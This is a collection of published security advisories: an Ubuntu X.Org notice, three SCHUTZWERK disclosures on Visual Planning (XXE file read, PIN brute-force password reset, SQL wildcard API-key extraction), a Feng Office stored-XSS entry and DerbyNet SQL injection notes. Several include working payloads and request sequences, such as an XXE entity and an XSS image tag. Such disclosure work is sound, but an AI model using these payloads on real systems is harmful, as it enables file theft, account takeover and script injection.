Ubuntu Security Notice 6721-1 - It was discovered that X.Org X Server incorrectly handled certain data. An attacker could possibly use this issue to expose sensitive information. It was discovered that X.Org X Server incorrectly handled certain glyphs. An attacker could possibly use this issue to cause a crash or expose sensitive information.

==========================================================================  
Ubuntu Security Notice USN-6721-1  
April 04, 2024

xorg-server, xwayland vulnerabilities  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 23.10  
- Ubuntu 22.04 LTS  
- Ubuntu 20.04 LTS  
- Ubuntu 18.04 LTS (Available with Ubuntu Pro)  
- Ubuntu 16.04 LTS (Available with Ubuntu Pro)  
- Ubuntu 14.04 LTS (Available with Ubuntu Pro)

Summary:

Several security issues were fixed in X.Org X Server, xwayland.

Software Description:  
- xorg-server: X.Org X11 server  
- xwayland: X server for running X clients under Wayland

Details:

It was discovered that X.Org X Server incorrectly handled certain data.  
An attacker could possibly use this issue to expose sensitive information.  
(CVE-2024-31080, CVE-2024-31081, CVE-2024-31082)

It was discovered that X.Org X Server incorrectly handled certain glyphs.  
An attacker could possibly use this issue to cause a crash or expose sensitive  
information. (CVE-2024-31083)

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 23.10:  
  xserver-xorg-core               2:21.1.7-3ubuntu2.8  
  xwayland                        2:23.2.0-1ubuntu0.5

Ubuntu 22.04 LTS:  
  xserver-xorg-core               2:21.1.4-2ubuntu1.7~22.04.9  
  xwayland                        2:22.1.1-1ubuntu0.12

Ubuntu 20.04 LTS:  
  xserver-xorg-core               2:1.20.13-1ubuntu1~20.04.16  
  xwayland                        2:1.20.13-1ubuntu1~20.04.16

Ubuntu 18.04 LTS (Available with Ubuntu Pro):  
  xserver-xorg-core               2:1.19.6-1ubuntu4.15+esm7  
  xwayland                        2:1.19.6-1ubuntu4.15+esm7

Ubuntu 16.04 LTS (Available with Ubuntu Pro):  
  xserver-xorg-core               2:1.18.4-0ubuntu0.12+esm12  
  xwayland                        2:1.18.4-0ubuntu0.12+esm12

Ubuntu 14.04 LTS (Available with Ubuntu Pro):  
  xserver-xorg-core               2:1.15.1-0ubuntu2.11+esm11

In general, a standard system update will make all the necessary changes.

References:  
  https://ubuntu.com/security/notices/USN-6721-1  
  CVE-2024-31080, CVE-2024-31081, CVE-2024-31082, CVE-2024-31083

Package Information:  
  https://launchpad.net/ubuntu/+source/xorg-server/2:21.1.7-3ubuntu2.8  
  https://launchpad.net/ubuntu/+source/xwayland/2:23.2.0-1ubuntu0.5  
  https://launchpad.net/ubuntu/+source/xorg-server/2:21.1.4-2ubuntu1.7~22.04.9  
  https://launchpad.net/ubuntu/+source/xwayland/2:22.1.1-1ubuntu0.12  
  https://launchpad.net/ubuntu/+source/xorg-server/2:1.20.13-1ubuntu1~20.04.16

Ubuntu Security Notice USN-6721-1

Authenticated attackers can exploit a weakness in the XML parser functionality of the Visual Planning application in order to obtain read access to arbitrary files on the application server. Depending on configured access permissions, this vulnerability could be used by an attacker to exfiltrate secrets stored on the local file system. All versions prior to Visual Planning 8 (Build 240207) are affected.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

Title  
=====

SCHUTZWERK-SA-2023-006: Arbitrary File Read via XML External Entities in   
Visual Planning

Status  
======

PUBLISHED

Version  
=======

1.0

CVE reference  
=============

CVE-2023-49234

Link  
====

https://www.schutzwerk.com/advisories/schutzwerk-sa-2023-006/

Text-only version:  
https://www.schutzwerk.com/advisories/SCHUTZWERK-SA-2023-006.txt

Affected products/vendor  
========================

All versions prior to Visual Planning 8 (Build 240207) by STILOG I.S.T.

Summary  
=======

Authenticated attackers can exploit a weakness in the XML parser   
functionality of the Visual Planning[0] application in order to obtain   
read access to arbitrary files on the application server. Depending on   
configured access permissions, this vulnerability could be used by an   
attacker to exfiltrate secrets stored on the local file system.

Risk  
====

An attacker can use the vulnerability to gather information and   
depending on the stored data, exfiltrate secrets from the file system.   
Furthermore, HTTP requests can be used for out-of-bands exfiltration and   
possibly server side request forgery (SSRF) attacks.

Description  
===========

During a recent red teaming assessment, Visual Planning was identified   
as part of the customers internet-facing assets. The software is   
developed by STILOG I.S.T. and provides resource management and   
scheduling features. A security assessment conducted by SCHUTZWERK found   
an arbitrary file read vulnerability via XML external entities in Visual   
Planning.  
The application Admin Center (vpadmin) communicates with the server   
through an XML-based protocol that utilizes proprietary compression   
methods and is transmitted via HTTP. SCHUTZWERK implemented a custom   
proxy as part of an assessment in order to intercept and manipulate the   
messages exchanged between application and server.

One of the messages sent by the Admin Center application after   
authentication is the following:

<?xml version="1.0" encoding="UTF-8"?>  
<com.visualplanning.query.parameters.GetApplicationProperty>  
<defaultValue>

</defaultValue>  
<propertyName>PWD</propertyName>  
<rawResult>false</rawResult>  
<section>INSTALLDATA</section>  
<userSession isNull="true"/>  
</com.visualplanning.query.parameters.GetApplicationProperty>

The method GetApplicationProperty is called to request the value of the   
property PWD. The server responds with an XML message, where the value   
element contains the response of the query:

<?xml version="1.0" encoding="UTF-8"?>  
<com.visualplanning.query.result.ApplicationPropertyResult>  
<resultValues/>  
<status>OK</status>  
<value>

</value>  
</com.visualplanning.query.result.ApplicationPropertyResult>

In this response it was observed that if the requested property value   
could not be resolved, the content of the request element defaultValue   
will be reflected as part of the response, making it a suitable back   
channel for XML external entity (XXE) injections.

The following message was sent to the Visual Planning application:

<?xml version="1.0" encoding="UTF-8"?>  
<!DOCTYPE foo [<!ENTITY example SYSTEM   
"C:\xampp2\tomcat\webapps\vplanning\configuration\install.properties"> ]>  
<com.visualplanning.query.parameters.GetApplicationProperty>  
<defaultValue>&example;</defaultValue>  
<propertyName>ShowBackground</propertyName>  
<rawResult>false</rawResult>  
<section>Application</section>  
<userSession isNull="true"/>  
</com.visualplanning.query.parameters.GetApplicationProperty>

The server responds with the content of the requested install.properties   
file inside the value element, thus confirming the XML parser is   
vulnerable to XML external entity (XXE) injections:

<?xml version="1.0" encoding="UTF-8"?>  
<com.visualplanning.query.result.ApplicationPropertyResult>  
<resultValues/>  
<status>OK</status>  
<value>#  
#Tue Oct 03 15:37:33 CEST 2023  
INSTALLDATA.INSTALLSERIAL=  
INSTALLDATA.INSTALLURL=http\://127.0.0.1\:8080/vplanning  
INSTALLDATA.OK=Next  
INSTALLDATA.PAGE=PROVIDER  
INSTALLDATA.POOLMODE=1  
INSTALLDATA.PORT=3306  
INSTALLDATA.PROVIDERTYPE=MySQL  
INSTALLDATA.PWD=ENCODE\:  
INSTALLDATA.SERVER=127.0.0.1  
INSTALLDATA.SERVERLANG=de  
INSTALLDATA.USER=root  
INSTALLDATA.VIEWERSERIAL=  
</value>  
</com.visualplanning.query.result.ApplicationPropertyResult>

Further testing showed that out-of-bands exfiltration via HTTPS requests   
is also generally possible.

Solution/Mitigation  
===================

The vendor suggests to update to Visual Planning 8 (Build 240207)

Disclosure timeline  
===================

2023-11-01: Vulnerability discovered  
2023-11-09: Contact vendor in order to determine security contact  
2023-11-10: Received generic sales response from vendor  
2023-11-14: Contacted CTO of vendor directly  
2023-11-16: Vulnerabilities demonstrated in call with contact at vendor  
2023-11-24: CVE assigned by Mitre  
2023-11-24: Additional technical details provided to vendor  
2023-12-19: Vendor informed SCHUTZWERK that work on fixing the findings   
is in progress  
2024-01-30: Inquired about mitigation status regarding the reported   
vulnerabilities  
2024-01-30: Vendor informed SCHUTZWERK that some of the issues were   
already fixed  
2024-03-08: Sent advisory drafts to vendor  
2024-03-28: Received patch information and release of advisory

Contact/Credits  
===============

The vulnerability was discovered during an assessment by Lennert Preuth   
and David Brown of SCHUTZWERK GmbH.

References  
==========

[0] https://www.visual-planning.com/en/

Disclaimer  
==========

The information provided in this security advisory is provided "as is"   
and without warranty of any kind. Details of this security advisory may   
be updated in order to provide as accurate information as possible. The   
most recent version of this security advisory can be found at SCHUTZWERK   
GmbH's website ( https://www.schutzwerk.com ).

Additional information  
======================

SCHUTZWERK Advisories: https://www.schutzwerk.com/blog/tags/advisories/

SCHUTZWERK Advisory Policy: https://www.schutzwerk.com/en/advisories/  
-----BEGIN PGP SIGNATURE-----

iQJOBAEBCgA4FiEEgLsg7Oj/wY3LSF87GrXfkTIXLrsFAmYF0bcaHGFkdmlzb3Jp  
ZXNAc2NodXR6d2Vyay5jb20ACgkQGrXfkTIXLrsdwA/+MyfbZTe36+AYi9q6GJE6  
S75Xm2aZtEM3NC5F6aMcELqFEW7LNjERmBoqfkHe+SWfgFxeCXl/XelHaNnR7HTM  
ZZPCGwJmOI+XaraInPVdCDw1QVIdiCG4VZzE0tlnFbLBgM+OTOxcDOoG7OhzP6mm  
ALfankzxu3AfbZhwebQtSXIQ+YqjitTsvjQGPleylqYK5CJbChsyvmMjomu/GzdO  
sWQ25ODCVUy6VORet8yn5OkQnM2CjSkteuTdNxCzd6JUB+vQ0g5FCE5NVzkqYq21  
YJ4Fc3PgkyAnrGefSbueL+Z/K6btM8RysJAwGahIEOdlkG8W/p09L0QQUGERT2VN  
UO6oTi/1OyoJBV9L5umr6aHss3P92ln90UAUW2dlZOdGSB8rlXisxLC1wtFZAXH9  
YwiGY/ACXmV1FtQQpgFxfNRyEWaltU5S0Y0bPAaW+ABSMLlK4X0Ft9E/4s4Yel2d  
TGngEnVKcR/PKNtrJbBqPDwt98R0MdQi0QxBRaxGxAg4Yr1qex8ph6IRT7bDTm0/  
1CKlQL7y9uvXlnFE4CO3IkKNp0ejKn3A7QEep4jit07VItIc+sRsoMnB6v54DoML  
ZfIisDoijb3doTNieyMpgTGZTDWLwLO36IS9JiqafNCAnngExqylFX6vYQVggtRz  
mZ2yA2/9ZfQwOawEirQtQr8=  
=TUGM  
-----END PGP SIGNATURE-----

--   
SCHUTZWERK GmbH, Pfarrer-Weiß-Weg 12, 89077 Ulm, Germany  
Zertifiziert / Certified ISO 27001, 9001 and TISAX

Phone +49 731 977 191 0

advisories@schutzwerk.com / www.schutzwerk.com

Geschäftsführer / Managing Directors:  
Jakob Pietzka, Michael Schäfer

Amtsgericht Ulm / HRB 727391  
Datenschutz / Data Protection www.schutzwerk.com/datenschutz

Visual Planning 8 Arbitrary File Read

Unauthenticated attackers can exploit a weakness in the password reset functionality of the Visual Planning application in order to obtain access to arbitrary user accounts including administrators. In case administrative (in the context of Visual Planning) accounts are compromised, attackers can install malicious modules into the application to take over the application server hosting the Visual Planning application. All versions prior to Visual Planning 8 (Build 240207) are affected.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

Title  
=====

SCHUTZWERK-SA-2023-004: Authentication Bypass via Password Reset   
Functionality in Visual Planning

Status  
======

PUBLISHED

Version  
=======

1.0

CVE reference  
=============

CVE-2023-49232

Link  
====

https://www.schutzwerk.com/advisories/schutzwerk-sa-2023-004/

Text-only version:  
https://www.schutzwerk.com/advisories/SCHUTZWERK-SA-2023-004.txt

Affected products/vendor  
========================

All versions prior to Visual Planning 8 (Build 240207) by STILOG I.S.T.

Summary  
=======

Unauthenticated attackers can exploit a weakness in the password reset   
functionality of the Visual Planning[0] application in order to obtain   
access to arbitrary user accounts including administrators. In case   
administrative (in the context of Visual Planning) accounts are   
compromised, attackers can install malicious modules into the   
application to take over the application server hosting the Visual   
Planning application.

Risk  
====

The application does not impose any limits on the number of guesses that   
can be made. Attackers can therefore initiate the reset for arbitrary   
users and automate the pin validation process until a valid pin is   
obtained. The vulnerability allows unauthenticated attackers to gain   
access to arbitrary user accounts including administrators.

Failed pin validation attempts are not logged by the application which   
greatly increases the difficulty of detecting ongoing attacks.

With administrative access to Admin Center, attackers can install   
malicious modules containing Java code that is executed on the   
application server, resulting in arbitrary command execution.

The entire pin space can be enumerated in approximately one to two hours.

Description  
===========

During a recent red teaming assessment, Visual Planning was identified   
as part of the customers internet-facing assets. The software is   
developed by STILOG I.S.T. and provides resource management and   
scheduling features. A security assessment conducted by SCHUTZWERK found   
an authentication bypass in Visual Planning's password reset functionality.  
The application Admin Center (vpadmin) communicates with the server   
through an XML-based protocol that utilizes proprietary compression   
methods and is transmitted via HTTP. SCHUTZWERK implemented a custom   
proxy as part of an assessment in order to intercept and manipulate the   
messages exchanged between application and server.

One of the first messages sent by the Admin Center application after   
launch is the following:

<?xml version="1.0" encoding="UTF-8"?>  
<com.visualplanning.query.NamedMethodParameter>  
<methodName>canResetPassword</methodName>  
<rawResult>false</rawResult>  
<userSession isNull="true"/>  
<values/>  
</com.visualplanning.query.NamedMethodParameter>

In this request, the client asks the server whether it should display   
the "Forgot your password ?" button as part of the login form. During   
the assessment, the server responded as follows:

<?xml version="1.0" encoding="UTF-8"?>  
<com.visualplanning.query.QueryResult>  
<resultValues>  
<HashtableValue>  
<key>resetPassword</key>  
<value class="java.lang.Boolean">false</value>  
</HashtableValue>  
</resultValues>  
<status>OK</status>  
</com.visualplanning.query.QueryResult>

By altering the value to "true", the password reset functionality   
becomes accessible in the application. At this point, attackers can   
provide the target username. This causes a request similar to the   
following to be issued:

<?xml version="1.0" encoding="UTF-8"?>  
<com.visualplanning.query.NamedMethodParameter>  
<methodName>sendResetPasswwd</methodName>  
<rawResult>false</rawResult>  
<userSession isNull="true"/>  
<values>  
<HashtableValue>  
<key>login</key>  
<value class="String">admin</value>  
</HashtableValue>  
</values>  
</com.visualplanning.query.NamedMethodParameter>

While handling this request, the server generates a five digit numeric   
pin and tries to send it to the email address associated with the   
provided username. Regardless of whether the email could be successfully   
transmitted, the generated pin is stored in a attribute of the session   
used while performing the reset. It should be noted that the password   
reset request message can be sent directly without enabling the button   
in the GUI if the message format is already known.

To complete the reset process, the correct pin (matching the pin stored   
in the session attribute) must be specified. A message similar to the   
following is issued by the application to validiate the provided pin:

<?xml version="1.0" encoding="UTF-8"?>  
<com.visualplanning.query.NamedMethodParameter>  
<methodName>validateResetPasswwd</methodName>  
<rawResult>false</rawResult>  
<userSession isNull="true"/>  
<values>  
<HashtableValue>  
<key>login</key>  
<value class="String">admin</value>  
</HashtableValue>  
<HashtableValue>  
<key>userCode</key>  
<value class="String">58344</value>  
</HashtableValue>  
</values>  
</com.visualplanning.query.NamedMethodParameter>

When an invalid pin is provided, the server responds with the following   
XML document:

<?xml version="1.0" encoding="UTF-8"?>  
<com.visualplanning.query.QueryResult>  
<resultValues>  
<HashtableValue>  
<key>ERROR</key>  
<value class="String">Invalid code.</value>  
</HashtableValue>  
</resultValues>  
<status>KO</status>  
</com.visualplanning.query.QueryResult>

In case the pin is valid, the server responds with a VPUser data   
structure similar to the following:

<?xml version="1.0" encoding="UTF-8"?>  
<com.visualplanning.query.QueryResult>  
<resultValues>  
<HashtableValue>  
<key>vpUser</key>  
<value class="com.visualplanning.data.admin.VPUser">  
<ID>1</ID>  
<UID>C442-53EB-B185-8804-F6BF-70AC-61C3-31BC</UID>  
<activated>true</activated>  
<comments>Super administrateur</comments>  
<email>yahd6Coo@schutzwerk.com</email>  
<expiredPasswd>false</expiredPasswd>  
<groups/>  
<imageProfilBase64></imageProfilBase64>  
<ldapSetting>  
<entityID>-1</entityID>  
</ldapSetting>  
<licenses/>  
<loginAttemps>0</loginAttemps>  
<mobilePhoneNumber></mobilePhoneNumber>  
<name>admin</name>  
<ownerID>0</ownerID>  
<phoneNumber></phoneNumber>  
<platform>VP</platform>  
<resetPasswd>true</resetPasswd>  
<resourceUser>false</resourceUser>  
</value>  
</HashtableValue>  
</resultValues>  
<status>OK</status>  
</com.visualplanning.query.QueryResult>

In addition, an empty password is set for the target username. Upon   
first login after reset, a new password must be set for this user.

Solution/Mitigation  
===================

The vendor suggests to update to Visual Planning 8 (Build 240207)

Disclosure timeline  
===================

2023-11-01: Vulnerability discovered  
2023-11-09: Contact vendor in order to determine security contact  
2023-11-10: Received generic sales response from vendor  
2023-11-14: Contacted CTO of vendor directly  
2023-11-16: Vulnerabilities demonstrated in call with contact at vendor  
2023-11-24: CVE assigned by Mitre  
2023-11-24: Additional technical details provided to vendor  
2023-12-19: Vendor informed SCHUTZWERK that work on fixing the findings   
is in progress  
2024-01-30: Inquired about mitigation status regarding the reported   
vulnerabilities  
2024-01-30: Vendor informed SCHUTZWERK that some of the issues were   
already fixed  
2024-03-08: Sent advisory drafts to vendor  
2024-03-28: Received patch information and release of advisory

Contact/Credits  
===============

The vulnerability was discovered during an assessment by Lennert Preuth   
and David Brown of SCHUTZWERK GmbH.

References  
==========

[0] https://www.visual-planning.com/en/  
[1]   
https://cheatsheetseries.owasp.org/cheatsheets/Forgot_Password_Cheat_Sheet.html

Disclaimer  
==========

The information provided in this security advisory is provided "as is"   
and without warranty of any kind. Details of this security advisory may   
be updated in order to provide as accurate information as possible. The   
most recent version of this security advisory can be found at SCHUTZWERK   
GmbH's website ( https://www.schutzwerk.com ).

Additional information  
======================

SCHUTZWERK Advisories: https://www.schutzwerk.com/blog/tags/advisories/

SCHUTZWERK Advisory Policy: https://www.schutzwerk.com/en/advisories/  
-----BEGIN PGP SIGNATURE-----

iQJOBAEBCgA4FiEEgLsg7Oj/wY3LSF87GrXfkTIXLrsFAmYF0TAaHGFkdmlzb3Jp  
ZXNAc2NodXR6d2Vyay5jb20ACgkQGrXfkTIXLrtU9xAArJL5rKh3sNRto6xC7bgj  
660J6OALXG9O9qaJo1RHYsVo9287THvSgsPs8/YXZhFNtkccsdxRll3t3UxC3IOU  
/h+f612I4lFlk9t0LVH2eu6r8lTw47YLbO9RKoBF0TsysJMnytuM9+BxRyd+nLVo  
rfVxmRfUhDKf5odkDz8IeatmMMeI1e7JuGylWtVOkSxdbCsmwEbObrEsCwe74AR4  
PKJDVb6tq03q1g5H0yq7QLCMyuN7UBc0Jb/sYkL3hu0m7JlqyCVUfNBaD1pqZvlA  
C3b+DnrJHwAPYKr5I4pKfss5Ghh3+yIaS/UIyaIImgS6pyBDOJUHULiMKumZYHCl  
r3YWOLAjuTUztRmsktavjgItsf2NsXnBLYMDjZuZtBd6iU7iNKQ4EdbCNt8YCN8w  
KmU3ot2Kwjty2aLj7CBdg8Mrc4Rr3PH2PoXWxSEBMWqokoO2zWVft+5BpJ/onU2P  
um41+KNb7h7Pf/QVkU1KOZbwAI9tgJvZn2hHXmbQov0w3s0J9dqNoJ4Eu+qVPMAx  
+Ug9Qvo3Qh325pDEeqxUhOsPh4dHam97ouDYE3XXLlKk8rar8TjhANAHHO4uUltW  
gikWB1VVmGy7XS9lflWE1QLqO8BBK1jZUDU21fWQeAeF64R6NXikj0tkfvjOwwt/  
CTQ2Nugk2kdYf5d73FSO9ds=  
=PvYR  
-----END PGP SIGNATURE-----

--   
SCHUTZWERK GmbH, Pfarrer-Weiß-Weg 12, 89077 Ulm, Germany  
Zertifiziert / Certified ISO 27001, 9001 and TISAX

Phone +49 731 977 191 0

advisories@schutzwerk.com / www.schutzwerk.com

Geschäftsführer / Managing Directors:  
Jakob Pietzka, Michael Schäfer

Amtsgericht Ulm / HRB 727391  
Datenschutz / Data Protection www.schutzwerk.com/datenschutz

Visual Planning 8 Authentication Bypass

A wildcard injection inside a prepared SQL statement was found in an undocumented Visual Planning 8 REST API route. The combination of fuzzy matching (via LIKE operator) and user-controlled input allows exfiltrating the REST API key based on distinguishable server responses. If exploited, attackers are able to gain administrative access to the REST API version 2.0.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

Title  
=====

SCHUTZWERK-SA-2023-003: Authentication Bypass in Visual Planning REST API

Status  
======

PUBLISHED

Version  
=======

1.0

CVE reference  
=============

CVE-2023-49231

Link  
====

https://www.schutzwerk.com/advisories/schutzwerk-sa-2023-003/

Text-only version:  
https://www.schutzwerk.com/advisories/SCHUTZWERK-SA-2023-003.txt

Affected products/vendor  
========================

All versions prior to Visual Planning 8 (Build 240207) by STILOG I.S.T.

Summary  
=======

A wildcard injection inside a prepared SQL statement was found in an   
undocumented Visual Planning[0] 8 REST API route. The combination of   
fuzzy matching (via LIKE operator) and user-controlled input allows   
exfiltrating the REST API key based on distinguishable server responses.   
If exploited, attackers are able to gain administrative access to the   
REST API v2.0.

Risk  
====

The vulnerability allows attackers to obtain a valid API key for the   
Visual Planning REST API v2.0. With such a key, attackers can use   
corresponding endpoints to exfiltrate company data or upload/download   
files. If no external user management (e.g. LDAP) is configured, the API   
key can also be used for user management tasks including the creation of   
administrative users. Since administrators are allowed to upload modules   
using the Visual Planning Admin Center, a compromise of the underlying   
server is likely.

Description  
===========

During a recent red teaming assessment, Visual Planning was identified   
as part of the customers internet-facing assets. The software is   
developed by STILOG I.S.T. and provides resource management and   
scheduling features. A security assessment conducted by SCHUTZWERK found   
an authentication bypass in Visual Planning's administrative REST API   
v2.0.[1]

Corresponding API routes are implemented in the PlanningWSRestV2.java   
file. A comparison between the documentation and implemented routes   
revealed an undocumented route (documentation accessed on 2024-03-05),   
which is externally reachable via a GET request to the /session endpoint.

The following code snippet shows the corresponding undocumented route,   
which takes the value of the apikey header as an argument:

vp.jar.src/com/visualplanning/webservice/PlanningWSRestV2.java  
/*      */   @GET  
/*      */   @Path("/session")  
/*      */   public Response openSession(@HeaderParam("apikey") String   
apikey, @HeaderParam("keepalive") String keepalive) {  
/*  123 */     if (apikey == null || apikey.trim().isEmpty()) {  
/*  124 */       return   
WSResponse.instance().errorApikey((Response.StatusType)Response.Status.FORBIDDEN,   
apikey);  
/*      */     }  
/*      */  
/*  127 */     WSSession session = WSSession.existsSession(apikey);  
/*  128 */     if (session != null) {  
/*  129 */       return   
WSResponse.instance().error((Response.StatusType)Response.Status.FORBIDDEN,   
"Already opened session for apikey : ", apikey);  
/*      */     }  
/*      */  
/*  132 */     if (WSSession.getSession(apikey, (keepalive != null &&   
Boolean.parseBoolean(keepalive) == true)) == null) {  
/*  133 */       return   
WSResponse.instance().errorApikey((Response.StatusType)Response.Status.FORBIDDEN,   
apikey);  
/*      */     }  
/*  135 */     return WSResponse.instance().success("WSSession created   
for apikey : " + apikey);  
/*      */   }

Line 132 shows a call to the getSession(apikey, ...) method of the   
WSSession class. Subsequently, the getSession(..) method will call the   
makeSession(apikey, ..) method of the same class.

The following code snippet shows the makeSession(..) method. Line 646   
contains the vulnerable prepared SQL statement, which is prone to   
wildcard injections[2] due to the usage of the LIKE operator in   
combination with user-controlled input:

vp.jar.src/com/visualplanning/webservice/WSSession.java  
/*      */   private static WSSession makeSession(String apiKey,   
WSSessionType type) {  
/*  634 */     WSSession wsSession = new WSSession();  
/*  635 */     WebApplicationContext applicationContext =   
WebApplicationContext.getDefaultApplication();  
/*  636 */     UserSession userSession =   
applicationContext.createUserSession();  
/*      */  
/*  638 */     DBConnection connection =   
applicationContext.createUserSession().getDBConnection();  
/*  639 */     String databaseName =   
applicationContext.getProperty("Application", "Databasename",   
"VisualPlanning7");  
/*      */  
/*  641 */     connection.setPoolMode(false);  
/*  642 */     connection.setDatabase(databaseName);  
/*      */  
/*      */     try {  
/*  645 */       if (type == WSSessionType.CLIENT) {  
/*  646 */         String planningQuery = "SELECT XMLContent FROM   
Planning WHERE XMLContent LIKE ?";  
/*  647 */         PreparedStatement stmt =   
connection.createPreparedStatement(planningQuery);  
/*  648 */         stmt.setString(1, "%<APIKey>" + apiKey + "</APIKey>%");  
/*  649 */         ResultSet rs = stmt.executeQuery();  
/*      */  
/*  651 */         if (!rs.next()) {  
/*  652 */           return null;  
/*      */         }

The following GET request demonstrates the behavior of injecting a   
percent sign as wildcard character:

GET /vplanning/api/v2/session HTTP/1.1  
Host: vp-host  
apikey: %  
[..]

The server will respond with a success message, indicating that a   
session was created for the used API key:

HTTP/1.1 200  
[..]

WSSession created for apikey : %

Further tests showed that an apikey header payload of '1%' will result   
in a similar success response, if the api key starts with the character   
'1'. A payload with a different non-matching first apikey character like   
'2%' will result in a status code 403 and the error message 'Invalid API   
key (2%)'.

The proof-of-concept script brute_vp_apikey.py[3] was developed in order   
to automate the process of exfiltrating the full apikey. The script can   
be executed as follows against a vulnerable Visual Planning instance and   
to extract the administrative api key:

$ python3 brute_vp_apikey.py --url http://127.0.0.1:8080  
Visual Planning API Key: 79d4add3-6995-8cae-976b-4aaaddd90616

Solution/Mitigation  
===================

The vendor suggests to update to Visual Planning 8 (Build 240207)

Disclosure timeline  
===================

2023-11-01: Vulnerability discovered  
2023-11-09: Contact vendor in order to determine security contact  
2023-11-10: Received generic sales response from vendor  
2023-11-14: Contacted CTO of vendor directly  
2023-11-16: Vulnerabilities demonstrated in call with contact at vendor  
2023-11-24: CVE assigned by Mitre  
2023-11-24: Additional technical details provided to vendor  
2023-12-19: Vendor informed SCHUTZWERK that work on fixing the findings   
is in progress  
2024-01-30: Inquired about mitigation status regarding the reported   
vulnerabilities  
2024-01-30: Vendor informed SCHUTZWERK that some of the issues were   
already fixed  
2024-03-08: Sent advisory drafts to vendor  
2024-03-28: Received patch information and release of advisory

Contact/Credits  
===============

The vulnerability was discovered by Lennert Preuth of SCHUTZWERK GmbH.

References  
==========

[0] https://www.visual-planning.com/en/  
[1]   
https://app.swaggerhub.com/apis-docs/VisualPlanning/visual-planning_api_rest_v_2_0_us/2.0-oas3  
[2]   
https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/07-Input_Validation_Testing/05-Testing_for_SQL_Injection#sql-wildcard-injection  
[3] https://www.schutzwerk.com/en/43/assets/advisories/brute_vp_apikey.py

Disclaimer  
==========

The information provided in this security advisory is provided "as is"   
and without warranty of any kind. Details of this security advisory may   
be updated in order to provide as accurate information as possible. The   
most recent version of this security advisory can be found at SCHUTZWERK   
GmbH's website ( https://www.schutzwerk.com ).

Additional information  
======================

SCHUTZWERK Advisories: https://www.schutzwerk.com/blog/tags/advisories/

SCHUTZWERK Advisory Policy: https://www.schutzwerk.com/en/advisories/  
-----BEGIN PGP SIGNATURE-----

iQJOBAEBCgA4FiEEgLsg7Oj/wY3LSF87GrXfkTIXLrsFAmYF0QkaHGFkdmlzb3Jp  
ZXNAc2NodXR6d2Vyay5jb20ACgkQGrXfkTIXLrvAZhAArh5MI5kM1lTjcIPPMiDS  
VXJ51Z39qgcXySyrqrKslnP/2a/pfpakD8g161oOTSK/tt9Yd6L/6O5Vywe7Kx5V  
lkVw7bs9J0WCY8aYzJ9RxdALt7HexAG+USgbjFWFajdSNNJ8giBu3P3ZCE8/GbHJ  
0bKd8AN88NKL954olnI6qGbbnOr/QXWuIOWAYF9wXLgEk992hszYgt7SJIrFHuX6  
2TC4iWOv4+72HQiQ8QYXCAZZVBDr3mUPQRBSJ9AZ3x7mxtJtMg8DyW0OATNe9Qlq  
IUO7HFqrPwTQmFKf9whk8QD7/Y9dKTpAjlVzvXe49COqbjOzxmIe7muxwyVlOrqO  
J9ZqreOr/ENLUgYDBaTLSTAHdEFNeqRGPK3dG0yiRSi3dtavJwr8PN1L52qTqLzT  
C+Yrruu6Ac6pSin1Ea9WaXF+YS1ErRcbZxkRD5pS4s6V4NMkV4bDWlDtraQ0rDfL  
AA+TxtA25p34S2MV/b3qAiA66UjrXEb6IJVNx4Rx7X3+gcLgI2w7t3DQEVuPaB3k  
ltT1oV6ei7tqeQpn7usHzlfa6lq7Q3PIRpxYAo0g4kp4cVVblLRNWDpZMK+cBj1N  
MrGP2f50gbpYej/yYHsXNU2pMfbUPoSq3X8uwVCoLvaBSBWx7I3TM1hl0/3wBi/w  
phO+Bauh2QYGX2mFw/mduZM=  
=ycwQ  
-----END PGP SIGNATURE-----

--   
SCHUTZWERK GmbH, Pfarrer-Weiß-Weg 12, 89077 Ulm, Germany  
Zertifiziert / Certified ISO 27001, 9001 and TISAX

Phone +49 731 977 191 0

advisories@schutzwerk.com / www.schutzwerk.com

Geschäftsführer / Managing Directors:  
Jakob Pietzka, Michael Schäfer

Amtsgericht Ulm / HRB 727391  
Datenschutz / Data Protection www.schutzwerk.com/datenschutz

Visual Planning REST API 2.0 Authentication Bypass

Feng Office version 3.10.8.21 suffers from a persistent cross site scripting vulnerability.

Change Mirror Download

    # Exploit Title: Feng Office version 3.10.8.21  - Stored XSS# Exploit Author: tmrswrr # Vendor Homepage: https://www.fengoffice.com/# version 3.10.8.21 1 ) Login admin https://127.0.0.1/Feng_Office/index.php?c=access&a=index#2 ) Click Tasks > "><img src=x onerrora=confirm() onerror=confirm(1)> add task 3 ) Click Add worked hours you will be see xss alert

Feng Office 3.10.8.21 Cross Site Scripting

DerbyNet 9.0 suffers from a remote SQL injection vulnerability in print/render/racer.inc.

CVE ID: CVE-2024-30923

Description:  
An SQL Injection vulnerability has been discovered in DerbyNet version 9.0, specifically within the `print/render/racer.inc` component. This vulnerability allows remote attackers to execute arbitrary code and disclose sensitive information by exploiting improper sanitization of the `where` clause in Racer Document Rendering.

Vulnerability Type: SQL Injection

Vendor of Product: DerbyNet - Available on GitHub: https://github.com/jeffpiazza/derbynet

Affected Product Code Base: DerbyNet - v9.0

Affected Component: print/render/racer.inc

Attack Type: Remote

Impact:  
- Code execution: True  
- Information Disclosure: True

Attack Vectors:  
The vulnerability is present in the `print/render/racer.inc` component of DerbyNet, due to insufficient sanitization of the `where` parameter within the URL. Attackers can manipulate SQL queries by injecting malicious SQL commands through the `where` parameter, as demonstrated in the following URL:  
- `http://127.0.0.1:8000/render-document.php/award/GoldCupAwardDocument?where=1`

This manipulation could lead to unauthorized access to database information and potential code execution on the server hosting the application.

Discoverer: Valentin Lobstein

References:  
- Official website: http://derbynet.com  
- Source code on GitHub: https://github.com/jeffpiazza/derbynet

DerbyNet 9.0 print/render/racer.inc SQL Injection

DerbyNet 9.0 suffers from a remote SQL injection vulnerability in print/render/award.inc.

